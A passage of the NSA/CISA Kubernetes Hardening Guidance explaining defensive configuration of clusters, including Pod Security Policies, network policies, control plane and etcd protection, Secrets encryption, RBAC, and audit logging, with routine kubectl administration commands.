deployment, NSA and CISA \nencourag e developers to build container applications to execute as a non -root user. \nHaving non -root execution integrated at build time provides better assurance that \napplications will function correctly without root privileges . \nRootless container engines : some co ntainer engines can run in an unprivileged \ncontext rather than using a daemon running as root . In this scenario, execution \nwould appear to use the root user from the containerized application’s perspective, \nbut execution is remapped to the engine’s user co ntext on the host . While rootless \ncontainer engines add an effective layer of security, many are currently released as \nexperimental and should not be used in a production environment. Administrators \nshould be aware of this emerging technology and seek adop tion of rootless \ncontainer engines when vendors release a stable version compatible with \nKubernetes. \nImmutable container file systems \nBy default, containers are permitted mostly unrestricted execution within their own \ncontext. A cyber actor who has gained execution in a container can create files, \ndownload scripts, and modify the application within the container . Kubernetes can lock \ndown a container’s file system , thereby preventing many post -exploitation activities . \nHowever, these limitations also affect legitimate container applications and can \npotentially result in crashes or anomalous behavior . To prevent damaging legitimate \napplications , Kubernetes administrators can mount secondary read/write file systems for \nspecific directories where applications require write access. Appendix B : Example \ndeployment template for read-only filesystem shows an example immutable \ncontainer with a writable directory. \nBuilding secure container images \nContainer images are usually created by either building a container from scratch or by \nbuilding on top of an existing image pulled from a repository. In addition to using trusted \nrepositories to build containers, image scanning is key to ensuring deployed containers \nare secure. Throughout the container build workflow, images s hould be scanned to \nidentify outdated libraries, known vulnerabilities, or misconfigurations, such as insecure \nports or permissions. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 9 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n \nFigure 4: A container build workflow , optimized with webhook and admission controller \nOne appr oach to implementing image scanning is by using an admission controller. An \nadmission controller is a Kubernetes -native feature that can intercept and process \nrequests to the Kubernetes API prior to persistence of the object, but after the request is \nauthe nticated and authorized. A custom or proprietary webhook can be implemented to \nscan any image before it is deployed in the cluster. This admission controller could \nblock deployments if the image doesn’t comply with the organization’s security policies \ndefined in the webhook configuration [4]. \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 10 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nPod Security Policies \nA Pod Security Policy (PSP) is a cluster -wide policy that specifies security \nrequirements/defaults for Pods to execute within the cluster. While security mechanisms \nare often specified within Pod/deployment configurations, PSPs establish a minimum \nsecurity threshold to which all Pods must adhere. \nSome PSP fields provide default val ues used when a \nPod’s configuration omits a field. Other PSP fields are \nused to deny the creation of non -conformant Pods. \nPSPs are enforced through a Kubernetes admission \ncontroller, so PSPs can only enforce requirements \nduring Pod creation. PSPs do not af fect Pods already running in the cluster. \nPSPs are useful technical controls to enforce security measures in the cluster. PSPs \nare particularly effective for clusters managed by admins with tiered roles . In these \ncases, top -level admins can impose defaults to enforce requirements on lower -level \nadmins. NSA and CISA encourage organizations to adapt the Kubernetes hardened \nPSP template in Appendix C: Example Pod Security Policy to their needs. The \nfollowing table describes some widely applicable PSP component s. \nTable I: Pod Security Policy components2 \nField Name(s) Usage Recommendations \nprivileged Control s whether Pods can run \nprivileged containers. Set to false. \nhostPID, hostIPC Controls whether containers can \nshare host process namespaces. Set to false. \nhostNetwork Controls whether containers can \nuse the host network. Set to false. \nallowedHostPaths Limits containers to specific paths \nof the host file system. Use a “dummy” path name (such \nas “/foo” marked as read -only). \nOmitting this field results in no \nadmission restrictions being placed \non containers. \nreadOnlyRootFilesystem Requires the use of a read only \nroot file system. Set to true when possible. \nrunAsUser, runAsGroup, \nsupplementalGroups, \nfsGroup Controls whether container \napplications can run with root \nprivileges or with root group \nmembership. \n - Set runAsUser to \nMustRunAsNonRoot. \n- Set runAsGroup to non -zero (See \nthe example in Appendix C: \nExample Pod Security Policy). \n \n2 https://kubernetes.io/docs/concepts/policy/pod -security -policy Pod creation adheres \nto the least restrictive \nauthorized policy. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 11 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nField Name(s) Usage Recommendations \n- Set supplementalGroups to non -\nzero (see example i n appendix C). \n- Set fsGroup to non -zero (See the \nexample in Appendix C: Example \nPod Security Policy). \nallowPrivilegeEscalation Restricts escalation to root \nprivileges. Set to false. This measure is \nrequired to effectively enforce \n“runAsUser: MustRunAsNo nRoot” \nsettings. \nseLinux Sets the SELinux context of the \ncontainer. If the environment supports \nSELinux, consider adding SELinux \nlabeling to further harden the \ncontainer . \nAppArmor annotations Sets the AppArmor profile used by \ncontainers. Where possible, harden \ncontainerized applications by \nemploying AppArmor to constrain \nexploitation. \nseccomp annotations Sets the seccomp profile used to \nsandbox containers. Where possible, use a seccomp \nauditing profile to identify required \nsyscalls for runnin g applications; \nthen enable a seccomp profile to \nblock all other syscalls. \nNote : PSPs do not automatically apply to the entire cluster for the following reasons: \n First, before PSPs can be applied, the PodSecurityPolicy plugin must be enabled \nfor the Kuber netes admission controller, part of kube-apiserver . \n Second, the policy must be authorized through RBAC. Administrators should \nverify the correct functionality of implemented PSPs from each role within their \ncluster’s organization. \nAdministrators should be cautious in environments with multiple PSPs as Pod creation \nadheres to the least restrictive authorized policy. The following command describe s all \nPod Security Policies for the given namespace, which can help to identify problematic \noverlapping policie s: \nkubectl get psp -n <namespace> \nProtecting Pod service account tokens \nBy default, Kubernetes automatically provisions a service account when creating a Pod \nand mounts the account’s secret token within the Pod at runtime. Many containerized \napplications d o not require direct access to the service account as Kubernetes \norchestration occurs transparently in the background. If an application is compromised, \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 12 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \naccount tokens in Pods can be gleaned by cyber actor s and used to further compromise \nthe cluster. When an application does not need to access the service account directly , \nKubernetes administrators should ensure that Pod specifications disable the secret \ntoken being mounted. This can be accomplished using the \n“automountServiceAccountToken: false” directive in the Pod’s YAML \nspecification . \nHardening container engines \nSome platforms and container engines provide additional options to harden the \ncontainerized environments. A powerful example is the use of hypervisors to provide \ncontainer isolation. Hypervisors rely on hardware to enforce the virtualization boundary \nrather than the operating system. Hypervisor isolation is more secure than traditional \ncontainer isolation. Container engines running on the Windows® operating system can \nbe configured to use the built-in Windows hypervisor , Hyper -V®, to enhance security. \nAdditionally , some security focused container engines natively deploy each container \nwithin a lightweight hypervisor for defense -in-depth . Hypervisor -backed containers \nmitigate container breakout s. \n▲Return to Contents \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 13 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nNetwork separation and h ardening \nCluster networking is a central concept of Kubernetes. Communication between \ncontainers, Pods, services, and external services must be taken into consideration. By \ndefault, there are few network policies in place to separate resources and prevent \nlateral m ovement or escalation if a cluster is compromised. Resource separation and \nencryption can be an effective way to limit a cyber actor ’s movement and escalation \nwithin a cluster. \n \nNamespaces \nKubernetes n amespaces are one way to partition cluster resources among multiple \nindividuals, teams, or applications within the same cluster. By default, namespaces are \nnot automatically isolated . However, namespaces do assign a label to a scope, which \ncan be used to specify authorization rules via RBAC and networking pol icies. In addition \nto network isolation, policies can limit storage and compute resources to provide better \ncontrol over Pods at the namespace level. \nThere are three namespaces by default , and they cannot be deleted: \n kube -system (for Kubernetes components ) \n kube -public (for public resources) \n default (for user resources) \nUser Pods should not be placed in kube -system or kube -public, as these are reserved \nfor cluster services. A YAML file, shown in Appendix D: Example namespace , can be \nused to create new namespaces. Pods and services in different namespaces can still \ncommunicate with each other unless additional separation is enforced, such as network \npolicies . Key points \n Use network policies and firewalls to separate and isolate resources. \n Secure the control plane. \n Encrypt traffic and sensitive data (such as Secrets) at rest. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 14 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nNetwork p olicies \nNetwork policies control traffic flow between Pods, namespaces, and external IP \naddresses. By default, no network policies are applied to P ods or namespaces , \nresulting in unrestrict ed ingress and egress traffic \nwithin the Pod network . Pods become isolated \nthrough a network policy that applies to the Pod or \nthe Pod’s namespace. Once a Pod is select ed in a \nnetwork policy, it reject s any connections that are \nnot specifically allowed by any applicable policy \nobject. \nTo create network policies, a network plugin that \nsupports the NetworkPolicy API is required. Pods \nare selected using the podSelector and/or the \nnamespaceSelector options. An example \nnetwork policy is shown in Appendix E : Exam ple \nnetwork policy . Network policy formatting may \ndiffer depending on the container network interface \n(CNI) plugin used for the cluster. Administrators should use a default policy selecting all \nPods to deny all ingress and egress traffic and ensure any uns elected Pods are \nisolated. Additional policies could then relax these restrictions for permissible \nconnections. \nExternal IP addresses can be used in ingress and egress policies using ipBlock , but \ndifferent CNI plugins, cloud providers, or service implement ations may affect the order \nof NetworkPolicy processing and the rewriting of addresses within the cluster. \nResource policies \nIn addition to network policies, LimitRange and ResourceQuota are two policies that can \nlimit resource usage for namespaces or node s. A LimitRange policy constrains \nindividual resources per Pod or container within a particular namespace, e.g., by \nenforcing maximum compute and storage resources. Only one LimitRange constraint \ncan be created per namespace as shown in the example YAML file of Appendix F: \nExample LimitRange . Kubernetes 1.10 and newer supports LimitRange by default. \nUnlike LimitRange p olicies that apply to each Pod or container individually , \nResourceQuotas are restrictions placed on the aggregate resource usage for an entire Network Policies Checklist \n Use CNI plugin that supports \nNetworkPolicy API \n Create policies that select P ods using \npodSelector and/or the \nnamespaceSelector \n Use a default policy to deny all ingress \nand egress traffic . Ensure s unselected \nPods are isolated to all namespaces \nexcept kube -system \n Use LimitRange and ResourceQuota \npolicies to limit resources on a \nnamespace or Pod level \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 15 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nnamespace, such as limits placed on total CPU and memory usage. If a user tries to \ncreate a Pod that violate s a LimitRange or ResourceQuota policy, the Pod creation fail s. \nAn example ResourceQuota policy is shown in Appendix G: Example \nResourceQuota . \nControl plane hardening \nThe control plane is the core of Kubernetes and gives \nusers the ability to view containers, schedule new Pods, \nread Secrets , and execute commands in the cluster. \nBecause of these sensitive capabilities, the control \nplane should be highly protected. In addition to secure \nconfigurat ions such as TLS encryption, RBAC, and a \nstrong authentication method, network separation can \nhelp prevent unauthorized users from accessing the \ncontrol plane. The Kubernetes API server runs on ports \n6443 and 8080 , which should be protected by a firewall \nto accept only expected traffic. Port 8080, by default, is \nacce ssible without TLS encryption from the local \nmachine , and the request bypasses authentication and authorization modules. The \ninsecure port can be disabled using the API server flag --insecure -port=0 . The \nKubernetes API serve r should not be exposed to the Internet or an untrusted network. \nNetwork policies can be applied to the kube -system namespace to limit internet access \nto the kube -system. If a default deny policy is implemented to all namespa ces, the \nkube -system namespace must still be able to communicate with other control plane \nsegments and worker nodes. \nThe following table lists the control plane ports and services: \nTable II: Control plane ports \nProtocol Direction Port Range Purpose \nTCP Inbound 6443 or 8080 if not disabled Kubernetes API server \nTCP Inbound 2379 -2380 etcd server client API \nTCP Inbound 10250 kubelet API \nTCP Inbound 10251 kube -scheduler \nTCP Inbound 10252 kube -controller -manager \nTCP Inbound 10258 cloud -controller -manager (optional) Steps to secure the control plane \n1. Set up TLS encryption \n2. Set up strong authentication \nmethod s \n3. Disable access to internet and \nunnecessary, or untrusted networks \n4. Use RBAC policies to restrict \naccess \n5. Secure the etcd datastore with \nauthentication and RBAC policies \n6. Protect kubeconfig files from \nunauthorized modifications \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 16 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nEtcd \nThe etcd backend database stores state information and cluster Secrets . It is a critical \ncontrol plane component, and gaining write access to etcd could give a cyber actor root \naccess to the entire cluster. Etcd should only be accessed through the API server where \nthe cluster’s authentication method and RBAC policies can res trict users. The etcd data \nstore can run on a separate control plane node allowing a firewall to limit access to only \nthe API servers. Administrators should set \nup TLS certificates to enforce HTTPS \ncommunication between the etcd server \nand API servers. The etcd server should be \nconfigured to only trust certificates \nassigned to API servers. \nKubeconfig Files \nThe kubeconfig files contain sensitive \ninformation about clusters, users, \nnamespaces, and authentication mechanisms. Kubectl uses the configuration file s \nstored in the $HOME/.kube directory on the worker node and control plane local \nmachines . Cyber actors can exploit access to this configuration directory to gain access \nto and modify configurations or credentials to further compromise the cluster. The \nconfiguration files should be protected from unintended changes, and unauthenticated \nnon-root users should be blocked from accessing the files. \nWorker node segmentation \nA worker node can be a virtual or physical machine, depending on the cluster’s \nimplementat ion. Because nodes run the microservices and host the web applications for \nthe cluster, they are often the target of exploits. If a node becomes compromised, an \nadministrator should proactively limit the attack surface by separating the worker nodes \nfrom o ther network segments that do not need to communicate with the worker nodes or \nKubernetes services. A firewall can be used to separate internal network segments from \nthe external facing worker nodes or the entire Kubernetes service depending on the \nnetwork . Examples of services that may need to be separated from the possible attack \nsurface of the worker nodes are confidential databases or internal services that would \nnot need to be internet accessible. \nThe following table lists the worker node ports and se rvices: The etcd backend database \nis a critical control plane \ncomponent and the most \nimportant piece to secure \nwithin the cluster. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 17 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nTable III: Worker node ports \nProtocol Direction Port Range Purpose \nTCP Inbound 10250 kubelet API \nTCP Inbound 30000 -32767 NodePort Services \nEncryption \nAdministrators should configure all traffic in the Kubernetes cluster —including between \ncomponents, nodes , and the control plane —to use TLS 1.2 or 1.3 encryption. \nEncryption can be set up during installation or afterward using TLS bootstrapping , \ndetailed in the Kubernetes documentation , to cre ate and distribute certificates to nodes. \nFor all methods, certificates must be distributed amongst nodes to communicate \nsecurely. \nSecrets \nKubernetes Secrets maintain sensitive information, such as pa sswords, OAuth tokens, \nand SSH keys. Storing sensitive information in Secrets provides greater access control \nthan storing passwords or tokens in YAML files, container images, or environment \nvariables. By default, Kubernetes stores Secrets as unencrypted b ase64 -encoded \nstrings that can be retrieved by anyone with API access. Access can be restricted by \napplying RBAC policies to the secrets resource. \nSecrets can be encrypted by configuring data -at-rest encryption on the API server or by \nusing an external Key Management Service (KMS), which may be available through a \ncloud provider. To enable Secret data -at-rest encryption using the API server, \nadministrators should change the kube-apiserver manifest file to execute using the \n--encryption -provider -config argument. An example encryption -\nprovider -config file is shown in Appendix \nH: Example encryption . Using a KMS \nprovider prevent s the raw encryption key from \nbeing stored on the local disk. To encrypt \nSecrets with a KMS provider, the \nencrypti on-provider -config file should \nspecify the KMS provider as shown in \nAppendix I : Example KMS configuration . By default, Secrets are \nstored as unencrypted \nbase64 -encoded strings and \ncan be retrieved by anyone \nwith API access. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 18 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAfter applying the encryption -provider -config file, administrators should run the \nfollowing command to read and encrypt all Secrets: \nkubectl get se crets --all-namespaces -o json | kubectl replace -f - \nProtecting sensitive cloud infrastructure \nKubernetes is often deployed on virtual machines in a cloud environment. As such, \nadministrators should carefully consider the attack surface of the virtual mac hines on \nwhich the Kubernetes worker nodes are running. In many cases, Pods running on these \nvirtual machines have access to sensitive cloud metadata services on a non -routable \naddress. These metadata services provide cyber actors with information about th e cloud \ninfrastructure and possibly even short -lived credentials for cloud resources. Cyber \nactors abuse these metadata services for privilege escalation [5]. Kubernetes \nadministrators should prevent Pods from accessing cloud metadata services by using \nnetwork policies or through the cloud configuration policy. Because these services vary \nbased on the cloud provider, administrators should follow vendor guidance to harden \nthese access vectors. \n▲Return to Contents \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 19 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAuthentication and a uthorization \nAuthentication and authorization are the primary mechanisms to restrict access to \ncluster resources. Cyber actors can scan for well -known Kubernetes ports and access \nthe cluster’s database or make API calls without being authe nticated if the cluster is \nmisconfigured. User authentication is not a built -in feature of Kubernetes. However, \nseveral methods exist for administrators to add authentication to a cluster. \nAuthentication \nKubernetes clusters have two types of users : service accounts and normal user \naccounts. Service accounts handle API requests on behalf of Pods. Authentication is \ntypically managed automatically by Kubernetes through the ServiceAccount Admission \nController using bearer tokens. The bearer tokens are mounted i nto Pods at well -known \nlocations and can be used from outside the cluster if the tokens are left unsecured. \nBecause of this, access to Pod Secrets should be restricted to those with a need to view \nthem using Kubernetes RBAC. For normal users and admin acco unts, there is no \nautomatic authentication method for users . Administrators must add an authentication \nmethod to the cluster to implement authentication and authorization mechanisms. \nKubernetes assumes that a cluster -independent service manages user authentication. \nThe Kubernetes documentation lists several ways to implement user authentication \nincluding client certificates, bearer tokens, authentication plugins, and other \nauthentication protocols. At least one user authentication method should be \nimplemented. When multiple authentication methods are implemented, the first module \nto successfully authenticate the request \nshort -circuits the evaluation. Administrator s \nshould not use weak methods such as static \npassword files. Weak authentication \nmethods could allow cyber actors to \nauthenticate as leg itimate users. \nAnonymous requests are requests that are \nrejected by other configured authentication \nmethods and are not tied to any individual \nuser or Pod. In a server set up for token authentication with anonymous requests \nenabled, a request without a to ken present would be performed as an anonymous Administrators must add an \nauthentication method to \nthe cluster to implement \nauthentication and \nauthorization mechanisms. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 20 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nrequest. In Kubernetes 1.6 and newer, anonymous requests are enabled by default. \nWhen RBAC is enabled, anonymous requests require explicit authorization of the \nsystem:anonymous user or system:unauthenticated group. Anonymous \nrequests should be disabled by passing the --anonymous -auth=false option to the \nAPI server. Leaving anonymous requests enabled could allow a cyber actor to access \ncluster resources without authentication. \nRole -based access c ontrol \nRBAC is one method to control access to cluster resources based on the roles of \nindividuals within an organization. RBAC is enabled by default in Kubern etes version \n1.6 and newer. To check if RBAC is enabled in a cluster using kubectl, execute \nkubectl api -version . The API version for .rbac.authorization.k8s.io/v1 \nshould be listed if enabled. Cloud Kubernetes services may have a different way of \nchecking whether RBAC is enabled for the cluster. If RBAC is not enabled, start the API \nserver with the --authorization -mode flag in the following command: \nkube-apiserver --authorization -mode=RBAC \nLeaving authorization -mode flags , such as AlwaysAllow , in place allow s all \nauthorization requests, effectively disabling all authorization and limiting the ability to \nenforce least privilege for access. \nTwo types of permissions can be set : Roles and ClusterRoles. Roles set permissions \nfor particular namespaces, whereas ClusterRoles set permissions across all cluster \nresources regardless of namespace. Roles and ClusterRoles can only be used to add \npermissions. There are no deny rules. If a c luster is configured to use RBAC and \nanonymous access is disabled, the Kubernetes API server will deny permission s not \nexplicitly allowed. An example RBAC Role is shown in Appendix J : Example pod-\nreader RBAC Role . \nA Role or ClusterRole defines a permission but does not tie the permission to a user. \nRoleBindings and Cluster RoleBindings are used to tie a Role or ClusterRole to a user, \ngroup , or service account. RoleBindings grant permissions in Roles or ClusterRoles to \nusers, groups, or service accounts in a defined namespace. ClusterRole s are created \nindependent of namespaces and can then be granted to individuals using a RoleBinding \nto limi t the namespace scope. Cluster RoleBindings grant users, groups, or service \naccounts ClusterRoles across all cluster resources. An example RBAC RoleBinding and \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 21 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nClusterRoleBinding is shown in Appendix K : Example RBAC RoleBinding and \nClusterRoleBinding . \nTo cr eate or update Roles and ClusterRoles, a user must have the permissions \ncontained in the new role at the same scope or possess explicit permission to perform \nthe escalate verb on the Roles or ClusterRoles resources in the \nrbac.authorization.k8s.io API grou p. After a binding is created, the Role or \nClusterRole is immutable. The binding must be deleted to change a role. \nPrivileges assigned to users, groups, and service accounts should follow the principle of \nleast privilege, giving only required permissions t o resources. Users or user groups can \nbe limited to particular namespaces where required resources reside. By default, a \nservice account is created for each namespace for Pods to access the Kubernetes API. \nRBAC policies can be used to specify allowed actio ns from the service accounts in each \nnamespace. Access to the Kubernetes API is limited by creating an RBAC Role or \nClusterRole with the appropriate API request verb and desired resource on which the \naction can be applied. Tools exist that can help audit R BAC policies by printing users, \ngroups, and service account s with their associated assigned Roles and ClusterRoles . \n▲Return to Contents \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 22 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nLog auditing \nLogs capture activity in the cluster. Auditing logs is necessary, not only for ensuring that \nservices are operating and conf igured as intended, but also for ensuring the security of \nthe system. Systematic audit requirements man date consistent and thorough checks of \nsecurity settings to help identify compromises. Kubernetes is capable of capturing audit \nlogs for cluster actions and monitoring basic CPU and memory usage information; \nhowever, it does not natively provide in -depth m onitoring or alerting services. \n \nLogging \nSystem administrators running applications within Kubernetes should establish an \neffective logging, monitoring, and alerting system for their environment. Logging \nKubernetes events alone is not enough to provide a full picture of the actions occurring \non the system. Logging should also be performed at the host level, application level, \nand on the cloud if applicable. These logs can then be correlated with any external \nauthentication and system logs as applicable to provide a full view of the actions taken \nthroughout the environment for use by security auditors and incident responders. \nWithin the Kubernetes environment, a dministrators should monitor/log the following: \n API request history \n Performance metrics \n Deployment s \n Resource consumption \n Operating system calls \n Protocols, permission changes \n Network traffic Key points \n Establish Pod baselines at creation to enable anomalous activity identification. \n Perform logging at the host level, application level, and on the cloud if applicable. \n Integrate existing network security tools for aggregate scans, monitoring, alert s, \nand analysis . \n Set up local log storage to prevent loss in case of a communication failure. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 23 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n Pod scaling \nWhen a Pod is created or updated, administrators should capture detailed logs of the \nnetwork communications, response times, requests, resource consumption, and any \nother relevant metrics to establish a baseline. As detailed in the previous section, \nanonymous accounts should be disabled, but logging policies should still record actions \ntaken by anonymous accounts to identify anomalous activity. \nRBAC policy configurations should be audited periodically and whenever changes occur \nto the organization’s system administrators . Doing so ensure s access controls are \nadjusted in compliance with the RBAC policy -hardening guidance outlined in the r ole-\nbased a ccess control section. \nAudits should include comparisons of current logs to the baseline measurements of \nnormal activities to identify significant changes in any of the logged metrics and events. \nSystem administrators should investigate significant changes —e.g., a change in \napplication usage or installation of malicious processes such as a cryptominer —to \ndetermine the root cause. Audits of internal and external traffic logs should be \nconducted to ensure all intended security constraints on connections have been \nconfigured properly and are working as intended. \nAdministrators can also use these audits as \nsystems evolve to identify when exter nal access \nmay no longer be needed and can be restricted. \nLogs can be streamed to an external logging \nservice to ensure availability to security \nprofessionals outside of the cluster, identify \nabnormalities as close to real time as possible, \nand protect lo gs from being deleted if a \ncompromise occurs. If using this method, logs \nshould be encrypted during transit with TLS 1.2 or 1.3 to ensure cyber actors cannot \naccess the logs in transit and gain valuable information about the environment. Another \nprecaution to take when utilizing an external log server is to configure the log forwarder \nwithin Kubernetes with append -only access to the external storage. This helps protect \nthe externally stored logs from being deleted or overwritten from within the cluster. Kubernetes auditing \ncapabilities are \ndisabled by default, so \nif no audit policy has \nbeen written, nothing \nis logged. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 24 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nKubernetes native audit logging configuration \nThe kube-apiserver resides on the Kubernetes control plane and acts as the front \nend, handling internal and external requests for a cluster. Each request, whether \ngenerated by a user, an application, or the cont rol plane, produces an audit event at \neach stage in its execution. When an audit event registers, the kube-apiserver \ncheck s for an audit policy file and applicable rule. If such a rule exists, the server log s \nthe event at the level defined by the first matched rule. Kubernetes’ built -in auditing \ncapabilities are not enabled by default, so if no audit policy has been written, nothing is \nlogged. \nCluster administrators must write an audit policy YAML file to est ablish the rules and \nspecify the desired audit level at which to log each type of audit event. This audit policy \nfile is then passed to the kube-apiserver with the appropriate flags. For a rule to be \nconsidered valid, it must specify one of the four audit levels: None , Metadata , \nRequest , or RequestResponse . Appendix L: Audit Policy shows the contents of an \naudit policy file that logs all events at the RequestResponse level. Appendix M: \nExample flags with which to submit Audit Policy file to kube -apiserver shows \nwhere the kube-apiserver configuration file is located and provides an example of \nthe flags by which the audit policy file can be passed to the kube-apiserver . \nAppendix M also provides directions for how to mount the volumes and configure the \nhost pat h if necessary. \nThe kube-apiserver includes configurable logging and webhook backends for audit \nlogging. The logging backend writes the audit events specified to a log file, and the \nwebhook backend can be configured to send the file to an external HTTP API . The --\naudit-log-path and --audit-log-maxage flags , set in the example in Appendix \nM, are two examples of the flags that can be used to configure the log backend, which \nwrites audit events to a file. The log-path flag is the minimum configuration required \nto enable logging and the only configuration necessary for the logging backend. The \ndefault format for these log files is JSON, though this can also be changed if necessary. \nAdditional configuration options for t he logging backend can be found in the Kubernetes \ndocumentation . \nTo push the audit logs to the organization’s SIEM platform, a webhook backend can be \nmanually configured via a YAML file submitted to the kube-apiserver . An example \nwebhook config uration file and the flags needed to pass the file to the kube- \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 25 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \napiserver to attach the webhook backend are located in Appendix N: Webhook \nconfiguration . An exhaustive list of the config uration options, which can be set in the \nkube-apiserver for the webhook backend, can be found in the Kubernetes \ndocumentation . \nWorker node and container loggi ng \nThere are many ways for logging capabilities to be configured within a Kubernetes \narchitecture. In the built -in method of log management, the kubelet on each node is \nresponsible for managing logs. It stores and rotates log files locally based on its pol icies \nfor individual file length, storage duration, and storage capacity. These logs are \ncontrolled by the kubelet and can be accessed from the command line. The following \ncommand print s the logs of a container within a Pod: \nkubectl logs [ -f] [-p] POD [ -c CONTAINER] \nThe -f flag may be used if the logs are to be streamed, the -p flag may be used if logs \nfrom previous instances of a container exist and are desired, and the -c flag can be \nused to specify a container if there are more than one in the Pod. If an error occurs that \ncauses a container, Pod, or node to die, the native logging solution in Kubernetes does \nnot provide a method to preserve logs stored in the failed object. NSA and CISA \nrecommend configuring a remote logging solution to preserve logs should a node fail. \nOptions for remote logging include: \nRemote logging option Reason to use Configuration implementation \nRunning a logging agent on \nevery node to push logs to \na backend Gives the node the ability to \nexpose logs or push logs to a \nbackend, preserving them outside \nof the node in the case of a \nfailure . Configure an independent container \nin a Pod to run as a logging agent, \ngiving it access to the node’s \napplication log files and configuring \nit to forwar d logs to the \norganization’s SIEM . \nUsing a sidecar container in \neach Pod to push logs to \nan output stream Used to push logs to separate \noutput streams. This can be a \nuseful option when application \ncontainers write multiple log files \nof different formats. Configure sidecar container for \neach log type and use to redirect \nthese log files to their individual \noutput streams, where they can be \nhandled by the kubelet . The \nnode -level logging agent can then \nforward these logs onto the SIEM or \nother backend . \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 26 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nUsing a logging agent \nsidecar in each Pod to push \nlogs to a backend When more flexibility is needed \nthan the node -level logging agent \ncan provide . Configure for each Pod to push logs \ndirectly to the backend. This is a \ncommon method for attaching third -\nparty logg ing agents and backends. \nPushing logs directly to a \nbackend from within an \napplication Capture application logs. \nKubernetes does not have built -in \nmechanisms for exposing or \npushing logs to a backend \ndirectly . Organizations will need to either \nbuild this functionality into their \napplication or attach a reputable \nthird-party tool to enable this. \nA sidecar container is run in a Pod with other containers and can be configured to \nstream logs to a log file or logging backend. A sidecar container can also be co nfigured \nto act as a traffic proxy for another standard functionality container with which it is \npackaged and deployed. \nIn order to ensure continuity of these logging agents across worker nodes , it is common \nto run them as a DaemonSet. Configuring a Daemo nSet for this method ensures that \nthere is a copy of the logging agent on every node at all times and that any changes \nmade to the logging agent are consistent across the cluster. \nSeccomp: audit m ode \nIn addition to the node and container logging described above, it can be highly \nbeneficial to log system calls. One method for auditing container system calls in \nKubernetes is to use the Secure Compute Mode (seccomp) tool. This tool is disabled by \ndefault but can be used to limit a container’s system call abili ties, thereby lowering the \nkernel’s attack surface. Seccomp can also log what calls are being made by using an \naudit profile. \nA custom seccomp profile is used to define which system calls are allowed and default \nactions for calls not specified. To enable a custom seccomp profile within a Pod, \nKubernetes admins can write their seccomp profile JSON file to the \n/var/lib/kubelet/secc omp/ directory and add a seccompProfile to the Pod’s \nsecurityContext . A custom seccompProfile should also include two fields: \nType: Localhost and localhostProfile: myseccomppolicy.json . Logging \nall system calls can help administrators know what system call s are needed for \nstandard operations allowing them to restrict the seccomp profile further without losing \nsystem functionality. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 27 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency 